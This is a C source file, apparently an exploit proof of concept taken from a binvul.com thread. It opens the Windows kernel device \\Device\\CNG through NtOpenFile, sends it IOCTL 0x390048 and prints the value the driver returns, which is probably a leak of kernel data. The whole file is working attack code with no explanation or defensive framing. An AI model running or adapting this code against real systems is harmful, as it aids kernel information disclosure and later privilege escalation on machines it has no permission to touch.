// Source: http://www.binvul.com/viewthread.php?tid=508
#include <windows.h>
#include <winternl.h>
#include <stdio.h>
#pragma comment(lib, "ntdll.lib")
int
main(
int
argc, CHAR* argv[]) {
typedef NTSTATUS (__stdcall *NT_OPEN_FILE)(OUT PHANDLE FileHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes, OUT PIO_STATUS_BLOCK IoStatusBlock, IN ULONG ShareAccess, IN ULONG OpenOptions);
NT_OPEN_FILE NtOpenFileStruct;
PVOID Info;
HMODULE hModule = LoadLibrary((
"ntdll.dll"
));
NtOpenFileStruct = (NT_OPEN_FILE)GetProcAddress(hModule,
"NtOpenFile"
);
if
(NtOpenFileStruct == NULL) {
exit(-1);
}
UNICODE_STRING filename;
RtlInitUnicodeString(&filename, L
"\\Device\\CNG"
);
OBJECT_ATTRIBUTES obja;
obja.Attributes = 0x40;
obja.ObjectName = &filename;
obja.Length = 0x18;
obja.RootDirectory = NULL;
obja.SecurityDescriptor = NULL;
obja.SecurityQualityOfService = NULL;
IO_STATUS_BLOCK iostatusblock;
HANDLE hCNG = NULL;
NTSTATUS stat = NtOpenFileStruct(&hCNG, 0x100001, &obja, &iostatusblock, 7, 0x20);
if
(NT_SUCCESS(stat)) {
printf(
"File successfully opened.\n"
);
}
else
{
printf(
"File could not be opened.\n"
);
return
-1;
}
DWORD dwBuffer = 0;
DWORD dwCnt = 0;
BOOL bRet = DeviceIoControl((HANDLE)hCNG, 0x390048, &dwBuffer, 4, &dwBuffer, 4, &dwCnt, NULL);
if
(FALSE == bRet)
{
printf(
"[*]Send IOCTL fail!\n"
);
printf(
"[*]Error Code:%d\n"
, GetLastError());
}
else
{
printf(
"[*]0x%08x\n"
, dwBuffer);
}
CloseHandle(hCNG);
getchar();
return
0;
}